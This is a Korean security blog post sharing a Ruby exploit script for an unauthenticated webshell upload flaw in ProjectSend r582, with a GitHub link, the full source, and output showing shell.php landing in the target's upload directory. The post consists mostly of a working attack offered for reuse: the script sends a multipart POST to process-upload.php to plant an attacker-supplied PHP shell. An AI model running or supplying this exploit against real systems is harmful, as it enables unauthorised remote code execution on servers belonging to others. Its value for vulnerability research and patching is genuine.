최근 ProjectSend 라는 프레임워크에 대해 분석하던 중 Webshell 업로드가 가능한 취약점을 찾아 Exploit-db에 업로드하였으나.. 알고보니 기존에 올라왔던 취약점이였습니다 =_= .. 그저 기쁜마음에 스크립트부터 작성하여 넘겼지만 찾아볼 생각을 하지 않았었네요..
그래도 간단하게 ruby 언어로 짜서 사용가능하기에 블로그 통해 공유드릴까합니다.
현재 최신버전인 r582에서도 동작하는 제로데이네요.
GIT Repo
https://github.com/hahwul/ProjectSend_r582_webshell.git
- https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
- https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
git clone https://github.com/hahwul/ProjectSend_r582_webshell.git
Source Code
ProjectSend_r582_webshell.rb
——————————————————————–
Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
Date: 2015-07-01
Exploit Author: hahwul
Blog: http://www.codeblack.net
Vendor Homepage: http://www.projectsend.org
Software Link: http://www.projectsend.org/download/108/
Version: ProjectSend-r582
Tested on: debian [wheezy]
CVE : none
——————————————————————–
require “net/http” require “uri” require “net/http/post/multipart”
if ARGV.length != 2
puts “ProjectSend r582ver Webshell Upload” puts “Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]” puts " targetURL(ex): http://127.0.0.1/vul_test/ps" puts " ShellFile(ex): MyShell.php" puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php" puts " Include Gem : gem install multipart-post" puts " exploit & code by hahwul[www.codeblack.net]"
else
target_url = ARGV[0] # http://127.0.0.1/ps/ shell_name = ARGV[1] # myshell.php exp_url = target_url + “/process-upload.php”
uri = URI.parse(exp_url) http = Net::HTTP.new(uri.host, uri.port)
multipartParams = {“file” => UploadIO.new(File.new(shell_name), “application/octet-stream”, “shell.php”)} multipartParams = multipartParams.merge({“name”=>“shell.php”}) request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams) request[“Accept”] = “text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8” request[“Cache-Control”] = “no-cache” request[“User-Agent”] = “Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0” request[“Connection”] = “keep-alive” request[“Accept-Language”] = “ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3” request[“Accept-Encoding”] = “gzip, deflate” request[“Pragma”] = “no-cache” response = http.request(request)
puts “Target: “+uri.host+uri.path puts “Exploit…” puts “Status code: “+response.code puts “Open WebShell Page :: “+target_url+"/upload/files/"+shell_name
end
Execute & Result
ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php
Target: 127.0.0.1/vul_test/ps/process-upload.php Exploit… Status code: 302 Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php
Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php WEBSHELL UPLOAD total 12 drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 . drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 .. -rw-r–r– 1 www-data www-data 66 Jul 1 01:21 shell.php -rw-r–r– 1 www-data www-data 66 Jul 1 01:21 shell.php